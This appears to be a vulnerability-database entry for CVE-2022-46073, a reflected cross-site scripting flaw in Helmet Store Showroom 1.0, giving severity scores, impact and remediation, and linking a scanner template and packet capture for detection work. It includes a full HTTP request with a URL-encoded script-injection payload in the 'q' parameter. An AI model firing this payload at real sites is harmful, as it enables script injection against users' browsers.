🔙 목록으로 돌아가기

CVE-2022-46073: Helmet Store Showroom - Cross Site Scripting

TitleHelmet Store Showroom - Cross Site Scripting
AuthorHarsh
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.29531
CVE IDCVE-2022-46073
CWE IDCWE-79
Tags cve2022 cve xss helmet-store-showroom helmet_store_showroom_project vuln

🔍 Vulnerability Description

Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).

🌐 HTTP Request

GET /hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-46073.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-46073.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A